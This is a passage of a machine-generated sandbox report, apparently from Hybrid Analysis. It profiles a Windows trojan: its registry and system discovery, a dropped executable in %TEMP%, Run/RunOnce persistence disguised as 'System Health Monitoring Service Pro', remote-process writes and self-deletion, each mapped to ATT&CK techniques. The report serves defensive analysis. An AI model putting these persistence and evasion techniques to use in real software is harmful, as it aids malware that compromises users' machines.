\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"73E843F93273C6130227A37F9351B20A6B87E6552FAD38ED4BBE4E609246ABDF\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\DATACOLLECTION\"; Key: \"COMMERCIALDATAOPTIN\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"CATEGORY\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00002372)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" queries volume information of \"C:\\\" at 00000000-00002964-0000010C-146270\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002372-0000010C-277304", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" queries volume information of \"C:\\\" at 00000000-00002964-0000010C-146270\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00002372-0000010C-277304", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002372)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006600105b66000b5b6600000000000000000000006300000000019cdd22000000000000eb220095e1667727b90500feffffff435c6a7750596a77aa000000b80000000a5b6600085b660024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5c697760d88075ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096ed6a77325b6600a06a40758600000024df22005ce322000000000086008800a06a407524df2200916c4075325b6600a06a4075a06a407594e3220002020000 (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002964)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000007600a8677600a3677600000000000000000000007300000000019cdc22000000000000ea220095e1667797be0500feffffff435c6a7750596a77aa000000b8000000a2677600a067760024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5c697760d88075ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096ed6a77ca677600a06a40758600000024de22005ce222000000000086008800a06a407524de2200916c4075ca677600a06a4075a06a407594e2220002020000 (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf006b77d6006b770b594d7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00002372)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004792)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00002372)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00002964)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00002964)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has a section named \".eh_fram\"\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002964]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" wrote 16260 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"73e843f93273c6130227a37f9351b20a6b87e6552fad38ed4bbe4e609246abdf.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 200)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 216)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 216)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 216)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba
https://hybrid-analysis.com/sample/a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba
Hybrid Analysis - Ransomware
{"size": 606107, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba", "sha256": "a7eb1dd3300405ea3d7f8995e1f0d745cff468bf27baa37466b4a8fc543abbba", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 165, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 606111, "sha256": "187f64442ea7ecec651c6bb3317a137d01d1a8b7310a1fdbf0f226b5743545aa", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": 